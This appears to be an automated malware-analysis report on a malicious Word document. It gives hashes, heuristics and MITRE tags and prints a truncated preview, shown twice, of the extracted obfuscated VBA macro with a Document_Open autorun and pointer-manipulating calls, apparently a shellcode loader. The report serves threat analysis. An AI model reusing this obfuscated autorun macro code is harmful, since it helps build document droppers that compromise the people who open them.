Office (OLE) malware analysis — malicious · b72d8a41b69118ed

MALICIOUS

Office (OLE)

181.5 KB Created: 2017-08-22 13:25:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: d3e804f7a519ebaab1fde1d4eda8f084 SHA-1: 55d7e49a74216668d5917b032a660604226b8fa5 SHA-256: b72d8a41b69118edd168b396228d4318112ef4c0a3e8a83e344b555cdd22b49c

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document with a high-risk heuristic firing for VBA macros, specifically a Document_Open macro. The presence of obfuscated VBA code suggests an attempt to download and execute a secondary payload, a common technique for initial compromise. The document body contains what appears to be malformed image data, which is unusual and may be an attempt to hide malicious content.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 185,858 bytes but its declared streams total only 97,963 bytes — 87,895 bytes (47%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13786 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13786 bytes
SHA-256: `2e70c2ae35845d8bf643cba16bd2f26e8d85a19769b1d99e4b36b8547dbc4ad0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function necropolis(allomerous) Dim octopodidae As Long Dim conspection As Byte Dim chimes As Byte Dim phlebotomy As Variant #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim impatiently As Integer Dim anglomania As LongPtr capitalist = 74 + 8 - 74 Dim osteolysis As LongPtr Dim drawler As Byte Dim vitiligo As String Dim defending As LongPtr Dim afterdinner As Variant #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim anglomania As Long capitalist = 85 - 73 - 8 Dim osteolysis As Long Dim defending As Long #End If cooled = VarPtr(anglomania) blastoderm = chargeship(cooled, VarPtr(allomerous) + 8, capitalist) hyades = 1 - 2 osteolysis = 7 - 19 + 12 chagatai = 2 - 2 defending = 9980 + 2 lenticular = 4090 + 6 abounding = 107 - 104 + 61 seclusion = commiphora(ByVal hyades, osteolysis, ByVal chagatai, defending, ByVal lenticular, ByVal abounding) chironomus = "dosages" coalbin = Rnd(474) chargeship osteolysis, anglomania, 94 + 42 + 5747 plutocrat = 100 + 2 expressly = 15770 + 4 nicher = 537470 + 0 Pmt 0, plutocrat, 14522, 56157, 8 necropolis = osteolysis End Function Function chargeship(psychopharmacological, inconclusive, caroler) vagons = samara(20 / 4) #If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (vagons) Then Dim melanthiaceae As Variant Dim theorize As Integer Dim illconducted As LongPtr Dim unamazed As LongPtr Dim volatile As LongPtr Dim cellarage As String Dim semper As LongPtr Dim decrepitude As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (vagons) Then Dim unamazed As Long Dim ancestress As Byte Dim illconducted As Long Dim embassy As String Dim semper As Long Dim dauntless As Long Dim volatile As Long Dim publisher As Integer Dim decrepitude As Long Dim acquirable As Integer Dim alcelaphus As Variant #End If coalbin = ghazal \ 325 calorific = ghazal + 298 unamazed = psychopharmacological decrepitude = caroler calorific = calorific And 391 semper = inconclusive calculatingly = 40 + 3 arresting = 27220 + 9 bisect = 456720 + 0 Pmt 0, calculatingly, 37100, 49894, 4 ghazal = Math.Round(180) illconducted = 27 + 64 - 92 heartthrob ByVal illconducted, unamazed, semper, decrepitude, volatile coalbin = coalbin + 90 End Function Private Sub Document_Open() Dim beagling As Long Dim bangup As Byte impertinently = crackajack plunged = "cabriolet" draco slinging = 80 + 4 siriasis = 38570 + 4 aeciospore = 434070 + 6 Pmt 0, slinging, 21184, 21432, 5 End Sub Sub draco() Dim infelicitous As Long Dim cheloniidae As Byte skye.apc.Value = Day(#12/5/2013#) varday = discomycetes = "alamo" menteur = "boulebards" dakota = sanative compte = "exit" prester = "bacteria" dressed = "blazing" negatively = nononsense Set sunbeam = skye.apc.SelectedItem manorhouse = 60 + 6 dorm = 16730 + 9 flippant = 380250 + 8 Pmt 0, manorhouse, 38767, 34240, 6 acidic = sunbeam.Name whip = 7840 + 4 sickbed = Right(acidic, whip) analbuminemia = impersonation.lepore(sickbed) afghan = 20 + 2 puritanical = 31750 + 4 intrastate = 541970 + 1 Pmt 0, afghan, 30750, 34145, 3 clothesless = humility #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim cortege As String Dim hardearned As LongPtr Dim syllable As LongPtr Dim palanquin As String #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim dissentiente As Integer Dim syllable As Long Dim bosom As Long Dim hardearned As Long #End If meniscus = 77 - 8 - 69 inhibition = artsycraftsy anguillan = "aftercourse" client = 28 - 40 + 4108 nathless = 90 + 2 campaign = 29600 + 6 heartrobbing = 406070 + 6 Pmt 0, nathless, 7367, 54281, 5 athletic = "schooner" merely = ... (truncated)

SHA-256: 2e70c2ae35845d8bf643cba16bd2f26e8d85a19769b1d99e4b36b8547dbc4ad0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function necropolis(allomerous)
Dim octopodidae As Long
Dim conspection As Byte
Dim chimes As Byte
Dim phlebotomy As Variant
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim impatiently As Integer
Dim anglomania As LongPtr
capitalist = 74 + 8 - 74
Dim osteolysis As LongPtr
Dim drawler As Byte
Dim vitiligo As String
Dim defending As LongPtr
Dim afterdinner As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim anglomania As Long
capitalist = 85 - 73 - 8
Dim osteolysis As Long
Dim defending As Long
#End If
cooled = VarPtr(anglomania)
blastoderm = chargeship(cooled, VarPtr(allomerous) + 8, capitalist)
hyades = 1 - 2
osteolysis = 7 - 19 + 12
chagatai = 2 - 2
defending = 9980 + 2
lenticular = 4090 + 6
abounding = 107 - 104 + 61
seclusion = commiphora(ByVal hyades, osteolysis, ByVal chagatai, defending, ByVal lenticular, ByVal abounding)
chironomus = "dosages"

coalbin = Rnd(474)

chargeship osteolysis, anglomania, 94 + 42 + 5747
plutocrat = 100 + 2
expressly = 15770 + 4
nicher = 537470 + 0
 Pmt 0, plutocrat, 14522, 56157, 8

necropolis = osteolysis
End Function


Function chargeship(psychopharmacological, inconclusive, caroler)
vagons = samara(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (vagons) Then
Dim melanthiaceae As Variant
Dim theorize As Integer
Dim illconducted As LongPtr
Dim unamazed As LongPtr
Dim volatile As LongPtr
Dim cellarage As String
Dim semper As LongPtr
Dim decrepitude As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (vagons) Then
Dim unamazed As Long
Dim ancestress As Byte
Dim illconducted As Long
Dim embassy As String
Dim semper As Long
Dim dauntless As Long
Dim volatile As Long
Dim publisher As Integer
Dim decrepitude As Long
Dim acquirable As Integer
Dim alcelaphus As Variant
#End If
coalbin = ghazal \ 325
calorific = ghazal + 298
unamazed = psychopharmacological
decrepitude = caroler
calorific = calorific And 391
semper = inconclusive
calculatingly = 40 + 3
arresting = 27220 + 9
bisect = 456720 + 0
 Pmt 0, calculatingly, 37100, 49894, 4

ghazal = Math.Round(180)
illconducted = 27 + 64 - 92
heartthrob ByVal illconducted, unamazed, semper, decrepitude, volatile
coalbin = coalbin + 90
End Function
Private Sub Document_Open()
Dim beagling As Long
Dim bangup As Byte
impertinently = crackajack
plunged = "cabriolet"
draco
slinging = 80 + 4
siriasis = 38570 + 4
aeciospore = 434070 + 6
 Pmt 0, slinging, 21184, 21432, 5
End Sub
Sub draco()
Dim infelicitous As Long
Dim cheloniidae As Byte
skye.apc.Value = Day(#12/5/2013#)
varday = discomycetes = "alamo"
menteur = "boulebards"
dakota = sanative
compte = "exit"
prester = "bacteria"

dressed = "blazing"
negatively = nononsense
Set sunbeam = skye.apc.SelectedItem
manorhouse = 60 + 6
dorm = 16730 + 9
flippant = 380250 + 8
 Pmt 0, manorhouse, 38767, 34240, 6

acidic = sunbeam.Name
whip = 7840 + 4
sickbed = Right(acidic, whip)
analbuminemia = impersonation.lepore(sickbed)
afghan = 20 + 2
puritanical = 31750 + 4
intrastate = 541970 + 1
 Pmt 0, afghan, 30750, 34145, 3

clothesless = humility
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim cortege As String
Dim hardearned As LongPtr
Dim syllable As LongPtr
Dim palanquin As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim dissentiente As Integer
Dim syllable As Long
Dim bosom As Long
Dim hardearned As Long
#End If
meniscus = 77 - 8 - 69
inhibition = artsycraftsy
anguillan = "aftercourse"
client = 28 - 40 + 4108
nathless = 90 + 2
campaign = 29600 + 6
heartrobbing = 406070 + 6
 Pmt 0, nathless, 7367, 54281, 5

athletic = "schooner"
merely = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.